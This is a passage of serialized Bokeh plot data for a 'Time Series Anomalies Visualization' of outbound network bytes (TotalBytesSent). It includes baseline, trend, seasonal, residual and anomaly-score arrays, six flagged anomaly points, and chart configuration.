40,14188,12818,12793,13246,13314,27629,26980,29714,29418,27074,27056,26787,27988,27777,24578,25250,33791,29839,21041,20376,10938,12485,20612,20768,13969,13347,13713,14890,15731,25438,27213,28763,29887,29113,29274,29847,31064,31718,30200,30241,37911,34582,30220,28716,17700,19021,27595,27446,17815,16814,15899,16280,15796,19294,19667,17942,18181,16248,14068,14274,13205,13104,12579,12100,18284,17056,15942,15847,6749,8925,17714,18549,11069,11542,11984,13697,14469,16239,17402,17400,18622,18156,17795,18714,18438,18700,18913,18374,20746,20510,18965,18967,15257,16271,19516,19478,17406,17361,17312,18165,18098,18012,18319,18189,18036,17547,17356,17149,16663,16426,16176,15583,15317,15050,12619,12357,12101,12140,11909,11695,13062,12881,12718,13624,13496,13386,13032,12989,12965,12812,12823,12849,12535,12608,12709,13263,13428,13622,11385,11622,11869,12153,12402,12649,13930,14169,14406,15594,15839,16094,15714,15941,16182,16321,16581,16846,16852,17113,17355,18719,18905,19059,16396,16497,16580,16419,16479,16531,16930,16973,17012,18021,18046,18058,17037,16886,16721,16420,16236,16046,15665,15466,15272,17051,16877,16714,13489,13346,13212,12724,12601,12483,11900,11785,11672,12497,12385,12275],\"index\":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,262,263,264,265,266,267,268,269,270,271],\"residual\":[855,2173,249,-152,43,751,1077,-2839,1806,-3055,-1465,378,127,90,-2984,-2631,969,-553,-149,-15,3582,2382,-45,849,1206,589,-918,1231,745,-1669,-1351,1284,-2029,1567,938,947,-2067,-953,1076,165,-1438,-703,-334,1481,-1139,1601,-603,-1884,-2533,-2912,758,-1784,-1831,1449,611,4880,-933,2635,2491,-2758,1111,1812,3444,3589,-1197,102,424,-1520,-4283,-4729,1706,1729,-1214,-5287,501,342,1540,-440,-1543,-2085,374,4062,-2363,741,5591,-1101,4158,5585,4344,6296,-216,-3470,-6287,-9961,-652,-399,-9198,-5853,509,715,-502,-2405,-972,1525,4255,-2549,3668,3482,-4124,1216,-5726,-6004,-4111,-4568,10704,11273,18395,19899,-6046,-5894,18260,18409,-5631,-4630,-3715,-2101,-1617,-5115,-5826,-4101,-4340,-5151,-2971,-3177,518,619,1144,-1565,-7749,-6521,-5920,-5825,3272,3644,-5144,-5979,3075,2602,2160,4775,4003,2233,2074,2076,854,923,1284,365,-816,-1078,-1291,350,-2021,-1785,-1353,-1355,2354,3461,216,254,1931,1976,2025,490,557,643,-587,-457,-304,253,444,651,-496,-259,-9,901,1167,1434,-1164,-902,-646,-1595,-1364,-1150,928,1109,1272,-2925,-2797,-2687,-297,-254,-230,-173,-184,-210,1965,1892,1791,-786,-951,-1145,111,-125,-372,-2072,-2321,-2568,-2201,-2440,-2677,2526,2281,2026,1743,1516,1275,1782,1522,1257,-344,-605,-847,-905,-1091,-1245,97,-3,-86,1168,1108,1056,1614,1571,1532,1512,1487,1475,-952,-801,-636,-1144,-960,-770,-302,-103,90,1114,1288,1451,340,483,617,625,748,866,-58,56,169,-1386,-1274,-1164],\"score\":{\"__ndarray__\":\"bf2rzfkbzj8ggsOCv3njP0sKzlHvRLA/dvpj+xagqb+EyFcCT0V1P5+HcsGKVso/ELW6HWcU0z9Vn/pS3/Xpv0e9NQEIJuA/9v61wCfr67/xNpfcTwLbvxMMvwj0n7k/ZibOwIOvnT/N6hbZvfOSPwMJFrlhRuu/b+TdzCcT6L9vVf+vHh/RP2ACmSaD8sS/GR6sjbEwqb8RrV5O/AOHv1VLZG7YH/A/nhHUJcle5T/GjYy56jWUvz8P0BZH5M0/gvV2Syhr1T+8aEB4sXbEP4e4mCJoF9G/DXsW8zHf1T9xmZYK2B7KPwUIMgEutd6/OeBtEy7x2L+vgQzwMdXWP7r4e7cPnuK/Hogk87322z/M2PGsO4/QP2/LFrYBudA/LoetA0D24r/j2UQN3LnRv+EL0+PCD9M/dPp/o8ZapD8JXyjB/YTav+ZEEwL3Ysq/ixl7KBADur99slF/kmfaP7HFlR8uGdW/TADpo42U3D+NGBfFqcLGvwyPYFGNTeG/h4KGt7gv5794PoKUSZ/qvyvIHeyFl8o/9oMhAnpl4L+7i+VSjdLgv6yMXEIL09k/vHwRbOtCxT/QPorUAwL2P0CiK4cHXdG/HCvNwu+p5z8GlqV5v1vmP3lb1CnkOem/PS1/zjay0z/TuOyu9DPgPyD9V0Ft/+4/Z7O50/cn8D88GhI+YybWv7PN1UbpbpY/hKVAp/31vD/wj1xNmAHcv0biKlGFhvO/ChKRiQyM9b9hZO1j6XveP4+XvZeq5t4/U1Z0Fkt11r/lwk0XihP4v78Y/KjJRcE/5+FvdpMDtz82sLXXa3nbP02nFQiI2cC/HsMsgVls3L/RedIMBiDjvyp5RGqwVbk/JZn7ktNM8j8UVpt9MaXlv/1PWTu2+ck/3vYjCQs7+T/JqDKHzWjUv4J1swA5vPI/GXlIshQ0+T91sEeFDZTzPycx4uYbbfw/witbZUV0sb8toPuvRK7vv1X6iKPqm/y/472aMpKhBsBc3MXvh4nIv8zswvfaub6/LRbsH+PmBMAcxtkYUKT6v6erdkcNkME/ifJKeFoIyT/WmUsUFBnDv+U2nD2qBua/V2h2WQwS0r98xiJzzDPbPyo85XzHLPM/+8vDhtpU57++AFlLo4PwP5SLiY2dV+8/TV1yUwXO8r9TkYOOkpnVP5eKXurxEPq/ufjCoodT+792d0GX777yv3q45G460fS/tzsOlQY0CEDFHIsrJ34JQGmZs8Qg0RRAfrjDB26FFkAhacMCRIT7vzlMYGrj0/q/8PUgHPepFEByTV53MNUUQIaYIIu1ovm/y3Zr8CsZ9b94CqsybfPwv0XDD9wnReO/kaojPtLD3b8UWGRd9Ev3vyIQ/pH7hPq/gVB+BlWz8r8eDVCKqcjzv7dKiWa6dfe/VD20QDYo678NT+mMSQbtv+2QwFmZ48E/pA+MCi+NxT89/FtFYkvUPx5NFXt20ty/IYPkpzGeAcB3I/necav9v+gXwuIO8vq/1yWEg9KD+r9/J4XNQXDtP6cJ6+/JZ/A/puIzAZtt979WF9s4hTb7vxiP4oURp+s/nMNeB1pd5z9ytmEKlFvjP8slieQsiPU/tpniPF0I8j+UVelL/gTkP6FLeFD+k+I/0PRfiqKY4j8Qq9xZsRLOPxLvXkicSdA/r4EM8DHV1j+frrBFmK64P/mfliDye86/m3ViUwz+079ROSKBsNrXv7gHZbMamLc//1Pdz36L4r+NWBUfzGfgv5YyPYd2+ti/84QM+74D2b8T0Sj7zR3lPywbiS3hJu8/m5y17ILAqz/uQefXw6GwPyOLRCQgSOE/uukgO4+w4T+umszFRiLiP7+OE6+s38A/Gx1W/qJNwz9dyPvl+WvGP7zyIYgiLsa/ex/auFd3wb+8y+MDFda3vzOdSPAyj7A/DoSlv09pvj9GW3aEPbbGP6irb11h4cK/BdcATZyStL8syp/g0IiDvyXK7Jz+xs8/ay8seSO21D/yosnda43ZPzxLNcc3jdW/niUehCTN0L8u7uk41VHIv5IgO0S1Xd2/lncxBIUt2b+xCoqcPEzVv/s85WnRYNA/4NqvWu6o0z+AkzA5f53WPyYK5Ax1veq/hL75kmaU6b+FZTQiHpXov6VKja4eVLe/Y5/nxsc1tL/vLQgQMniyv/4Aa/vcq6y//SgN41BErr9lT6P33wSxvzrHpvwHl+E/GCgfu53t4D9qSOxOOAPgPxL5So50Zc2/hod1mZOw0b/IvAN7BzXVv9/3JNlJC5k/NDvtH4a1pb8sjQeKksS8vyKucJTaAeO/Q3WavbhD5b81k9ys8oDnv1vOTis7LeS/k0fyMuRX5r+dF64A6X3ov7Sm+275rOY/8TGhuWN05D9Fb8DimCTiPxvYaMKlJ98/2dP9aQYK2z8Mj+fma6vWPzGes5Sq3N8/8Mprxd8l2z/GqZ3U31fWP9CIrTS5vLq/R721rDrVxr8+mbEmuJvPvyoh1TER29C/+AwmRGM61L/10oEZLgXXvyjvcC6X+5Q/RufgcqUNgL+ACpeNXw2gv5rYE7PHutQ/sjHIIEqk0z8+1Lld7rLSP6mXrJTk0Nw/2CzD2k4J3D/CZngISlTbPx8vX4J199o/lKm/2muD2j9lu+MjuUvaP7QwXdM3tdG/hsxwV7Pwzb+MttCyAPXHv5oTHEFjMNW/KXqaolna0b9B01VR7dDMv0iCpjTzsLe/OOuoUJ6Eor/N6hbZvfOSP8koNnwjwNM/aSar18Ln1j8J3yu2U9zZP3KYMqdx3rY/NE5ohLGewD/qau0innrFP9L9Z8HhxMU/iJAEZrE6yj9th5THFoLOP5MDxsVZ+5e/3s+emYUtgj9FIHXgTe+kP5UBGv6hk9m/Ov2/qMiL1788SzXHN43Vvw==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[272]},\"seasonal\":[-11937,-9261,-8633,-9826,-10788,-9446,-9670,8827,7688,9805,10818,10535,10030,11347,9287,6255,7830,6189,7583,7447,-14291,-11223,-8705,-8247,-10625,-9120,-8344,-9684,-10333,-9384,-9604,7883,6641,9435,9721,8678,8625,9233,8670,6676,6304,5697,9439,7805,-9936,-8234,-9392,-8625,-8894,-8329,-8150,-9486,-9863,-9343,-9458,6695,5585,8658,8534,6890,6895,7061,7656,6620,4686,4898,11119,8282,-5180,-4651,-10051,-8984,-6693,-6812,-8015,-9455,-9555,-9167,-9147,5140,4494,7268,7050,4811,4919,4787,6128,6045,2954,3708,12305,8378,-423,-1116,-10599,-9105,-1038,-950,-7845,-8616,-8479,-7642,-7247,1921,3078,3944,4352,2876,2392,2414,3197,3547,1865,1886,9676,6592,2584,1534,-8942,-7006,2242,2822,-6023,-6171,-6159,-4774,-4188,417,1911,1283,2558,1558,175,1029,454,700,381,-31,6090,4707,3372,3003,-6410,-4581,3839,4299,-3559,-3464,-3400,-2060,-1659,-256,547,206,1121,386,-202,527,96,235,357,-237,2111,1877,349,376,-3300,-2248,1041,1056,-956,-933,-904,42,90,145,624,697,778,547,634,717,530,596,651,362,396,418,-1733,-1731,-1738,-1469,-1489,-1515,20,-11,-46,969,934,902,612,620,637,514,545,581,261,305,350,816,861,905,-1508,-1466,-1426,-1352,-1315,-1279,-206,-172,-138,844,878,915,307,298,298,195,214,244,25,80,141,1358,1431,1509,-1197,-1113,-1025,-1167,-1075,-982,-536,-442,-347,724,821,921,6,-18,-35,-168,-161,-141,-280,-218,-144,1906,2003,2111,-843,-716,-582,-801,-655,-504,-817,-659,-499,600,766,936],\"trend\":[21904,21908,21915,21925,21937,21951,21968,21986,22005,22025,22045,22064,22083,22101,22117,22132,22147,22167,22202,22237,22272,22306,22338,22364,22382,22388,22381,22360,22326,22281,22224,22153,22071,21979,21883,21787,21696,21612,21543,21492,21462,21454,21470,21506,21560,21628,21710,21806,21914,22030,22150,22268,22376,22465,22536,22591,22633,22661,22674,22677,22671,22659,22637,22604,22557,22498,22429,22356,22284,22217,22163,22132,22127,22152,22204,22273,22348,22413,22461,22488,22485,22445,22368,22263,22137,21999,21859,21731,21624,21541,21486,21461,21464,21493,21537,21590,21650,21719,21815,21963,22193,22532,22979,23516,24134,24818,25534,26237,26881,27432,27867,28171,28335,28354,28234,27989,27635,27182,26643,26028,25352,24624,23839,22986,22059,21054,19985,18877,17756,16658,15622,14690,13892,13245,12751,12404,12198,12132,12193,12349,12569,12843,13159,13507,13874,14249,14628,15007,15384,15757,16128,16496,16854,17193,17501,17770,17997,18187,18341,18464,18555,18611,18634,18632,18616,18590,18558,18519,18474,18422,18362,18294,18216,18122,18008,17867,17695,17491,17257,16999,16722,16432,16133,15829,15524,15220,14921,14631,14353,14089,13840,13609,13399,13210,13042,12893,12764,12654,12561,12484,12420,12368,12328,12298,12277,12267,12273,12302,12359,12447,12567,12717,12893,13089,13296,13506,13717,13928,14136,14341,14545,14750,14960,15179,15407,15643,15884,16126,16366,16602,16826,17032,17213,17361,17473,17550,17594,17610,17606,17586,17555,17514,17467,17415,17359,17297,17224,17136,17031,16905,16757,16588,16398,16188,15946,15685,15416,15144,14873,14602,14332,14063,13794,13526,13257,12987,12717,12445,12172,11896,11618,11338],\"weights\":[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]},\"selected\":{\"id\":\"1170\"},\"selection_policy\":{\"id\":\"1171\"}},\"id\":\"1135\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"overlay\":{\"id\":\"1142\"},\"x_range\":{\"id\":\"1007\"},\"y_range\":null},\"id\":\"1141\",\"type\":\"RangeTool\"},{\"attributes\":{\"source\":{\"id\":\"1135\"}},\"id\":\"1140\",\"type\":\"CDSView\"},{\"attributes\":{\"text\":\"Time Series Anomalies Visualization\"},\"id\":\"1005\",\"type\":\"Title\"},{\"attributes\":{},\"id\":\"1009\",\"type\":\"DataRange1d\"},{\"attributes\":{\"fill_alpha\":0.2,\"fill_color\":\"navy\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[2,2],\"line_width\":0.5},\"id\":\"1142\",\"type\":\"BoxAnnotation\"},{\"attributes\":{},\"id\":\"1020\",\"type\":\"BasicTicker\"},{\"attributes\":{},\"id\":\"1049\",\"type\":\"Selection\"},{\"attributes\":{\"axis_label\":\"TimeGenerated\",\"formatter\":{\"id\":\"1036\"},\"ticker\":{\"id\":\"1016\"}},\"id\":\"1015\",\"type\":\"DatetimeAxis\"},{\"attributes\":{\"data\":{\"TimeGenerated\":{\"__ndarray__\":\"AAAQJZ4zd0IAAPiToTN3QgAA4AKlM3dCAADgAqUzd0IAAMhxqDN3QgAAyHGoM3dC\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[6]},\"TotalBytesSent\":[48616,45856,48616,48616,45856,45856],\"baseline\":[37911,34582,30220,28716,27595,27446],\"index\":[114,115,116,117,120,121],\"level_0\":[0,1,2,3,4,5],\"residual\":[10704,11273,18395,19899,18260,18409],\"score\":{\"__ndarray__\":\"tzsOlQY0CEDFHIsrJ34JQGmZs8Qg0RRAfrjDB26FFkDw9SAc96kUQHJNXncw1RRA\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[6]},\"seasonal\":[9676,6592,2584,1534,2242,2822],\"trend\":[28234,27989,27635,27182,25352,24624],\"weights\":[1,1,1,1,1,1]},\"selected\":{\"id\":\"1101\"},\"selection_policy\":{\"id\":\"1102\"}},\"id\":\"1089\",\"type\":\"ColumnDataSource\"},{\"attributes\":{},\"id\":\"1011\",\"type\":\"LinearScale\"},{\"attributes\":{\"num_minor_ticks\":10,\"tickers\":[{\"id\":\"1051\"},{\"id\":\"1052\"},{\"id\":\"1053\"},{\"id\":\"1054\"},{\"id\":\"1055\"},{\"id\":\"1056\"},{\"id\":\"1057\"},{\"id\":\"1058\"},{\"id\":\"1059\"},{\"id\":\"1060\"},{\"id\":\"1061\"},{\"id\":\"1062\"}]},\"id\":\"1016\",\"type\":\"DatetimeTicker\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"blue\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"blue\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"score\"}},\"id\":\"1138\",\"type\":\"Circle\"},{\"attributes\":{\"axis_label\":\"TotalBytesSent\",\"formatter\":{\"id\":\"1038\"},\"ticker\":{\"id\":\"1020\"}},\"id\":\"1019\",\"type\":\"LinearAxis\"},{\"attributes\":{},\"id\":\"1050\",\"type\":\"UnionRenderers\"},{\"attributes\":{},\"id\":\"1101\",\"type\":\"Selection\"},{\"attributes\":{\"axis\":{\"id\":\"1015\"},\"grid_line_color\":null,\"ticker\":null},\"id\":\"1018\",\"type\":\"Grid\"},{\"attributes\":{\"fill_color\":{\"value\":\"blue\"},\"line_color\":{\"value\":\"blue\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"score\"}},\"id\":\"1137\",\"type\":\"Circle\"},{\"attributes\":{\"axis\":{\"id\":\"1019\"},\"dimension\":1,\"grid_line_color\":null,\"ticker\":null},\"id\":\"1022\",\"type\":\"Grid\"},{\"attributes\":{\"overlay\":{\"id\":\"1028\"}},\"id\":\"1024\",\"type\":\"BoxZoomTool\"},{\"attributes\":{\"below\":[{\"id\":\"1127\"},{\"id\":\"1132\"}],\"center\":[{\"id\":\"1130\"}],\"plot_height\":120,\"plot_width\":1200,\"renderers\":[{\"id\":\"1139\"}],\"title\":{\"id\":\"1117\"},\"toolbar\":{\"id\":\"1131\"},\"toolbar_location\":null,\"x_range\":{\"id\":\"1119\"},\"x_scale\":{\"id\":\"1123\"},\"y_range\":{\"id\":\"1121\"},\"y_scale\":{\"id\":\"1125\"}},\"id\":\"1116\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"data_source\":{\"id\":\"1089\"},\"glyph\":{\"id\":\"1091\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1092\"},\"selection_glyph\":null,\"view\":{\"id\":\"1094\"}},\"id\":\"1093\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"1026\",\"type\":\"SaveTool\"},{\"attributes\":{},\"id\":\"1025\",\"type\":\"ResetTool\"},{\"attributes\":{\"active_drag\":\"auto\",\"active_inspect\":\"auto\",\"active_multi\":null,\"active_scroll\":\"auto\",\"active_tap\":\"auto\",\"tools\":[{\"id\":\"1003\"},{\"id\":\"1023\"},{\"id\":\"1024\"},{\"id\":\"1025\"},{\"id\":\"1026\"},{\"id\":\"1027\"}]},\"id\":\"1029\",\"type\":\"Toolbar\"},{\"attributes\":{\"source\":{\"id\":\"1089\"}},\"id\":\"1094\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"1102\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"mantissas\":[1,2,5],\"max_interval\":500.0,\"num_minor_ticks\":0},\"id\":\"1051\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"firebrick\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"firebrick\"},\"size\":{\"units\":\"screen\",\"value\":12},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"TotalBytesSent\"}},\"id\":\"1092\",\"type\":\"CircleX\"},{\"attributes\":{\"base\":60,\"mantissas\":[1,2,5,10,15,20,30],\"max_interval\":1800000.0,\"min_interval\":1000.0,\"num_minor_ticks\":0},\"id\":\"1052\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"label\":{\"value\":\"anomalies\"},\"renderers\":[{\"id\":\"1093\"}]},\"id\":\"1115\",\"type\":\"LegendItem\"},{\"attributes\":{\"days\":[1,8,15,22]},\"id\":\"1056\",\"type\":\"DaysTicker\"},{\"attributes\":{\"days\":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31]},\"id\":\"1054\",\"type\":\"DaysTicker\"},{\"attributes\":{\"fill_color\":{\"value\":\"#1f77b4\"},\"line_color\":{\"value\":\"navy\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"TotalBytesSent\"}},\"id\":\"1041\",\"type\":\"Circle\"},{\"attributes\":{\"base\":24,\"mantissas\":[1,2,4,6,8,12],\"max_interval\":43200000.0,\"min_interval\":3600000.0,\"num_minor_ticks\":0},\"id\":\"1053\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"days\":[1,4,7,10,13,16,19,22,25,28]},\"id\":\"1055\",\"type\":\"DaysTicker\"},{\"attributes\":{\"days\":[1,15]},\"id\":\"1057\",\"type\":\"DaysTicker\"},{\"attributes\":{\"end\":1594624860000.0,\"start\":1593963540000.0},\"id\":\"1007\",\"type\":\"Range1d\"},{\"attributes\":{\"days\":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31]},\"id\":\"1175\",\"type\":\"DaysTicker\"},{\"attributes\":{\"mantissas\":[1,2,5],\"max_interval\":500.0,\"num_minor_ticks\":0},\"id\":\"1172\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"months\":[0,2,4,6,8,10]},\"id\":\"1180\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"days\":[1,15]},\"id\":\"1178\",\"type\":\"DaysTicker\"},{\"attributes\":{\"base\":60,\"mantissas\":[1,2,5,10,15,20,30],\"max_interval\":1800000.0,\"min_interval\":1000.0,\"num_minor_ticks\":0},\"id\":\"1173\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"base\":24,\"mantissas\":[1,2,4,6,8,12],\"max_interval\":43200000.0,\"min_interval\":3600000.0,\"num_minor_ticks\":0},\"id\":\"1174\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"format\":\"00\"},\"id\":\"1038\",\"type\":\"NumeralTickFormatter\"},{\"attributes\":{\"days\":[1,4,7,10,13,16,19,22,25,28]},\"id\":\"1176\",\"type\":\"DaysTicker\"},{\"attributes\":{\"months\":[0,1,2,3,4,5,6,7,8,9,10,11]},\"id\":\"1179\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"months\":[0,6]},\"id\":\"1182\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"days\":[1,8,15,22]},\"id\":\"1177\",\"type\":\"DaysTicker\"},{\"attributes\":{\"below\":[{\"id\":\"1015\"}],\"center\":[{\"id\":\"1018\"},{\"id\":\"1022\"},{\"id\":\"1063\"}],\"left\":[{\"id\":\"1019\"}],\"min_border_left\":50,\"plot_height\":360,\"plot_width\":1200,\"renderers\":[{\"id\":\"1043\"},{\"id\":\"1068\"},{\"id\":\"1093\"}],\"title\":{\"id\":\"1005\"},\"toolbar\":{\"id\":\"1029\"},\"toolbar_location\":\"above\",\"x_range\":{\"id\":\"1007\"},\"x_scale\":{\"id\":\"1011\"},\"y_range\":{\"id\":\"1009\"},\"y_scale\":{\"id\":\"1013\"}},\"id\":\"1004\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{},\"id\":\"1183\",\"type\":\"YearsTicker\"},{\"attributes\":{\"months\":[0,4,8]},\"id\":\"1181\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"days\":[\"%m-%d %H:%M\"],\"hours\":[\"%H:%M:%S\"],\"milliseconds\":[\"%H:%M:%S.%3N\"],\"minutes\":[\"%H:%M:%S\"],\"seconds\":[\"%H:%M:%S\"]},\"id\":\"1036\",\"type\":\"DatetimeTickFormatter\"},{\"attributes\":{\"data\":{\"TimeGenerated\":{\"__ndarray__\":\"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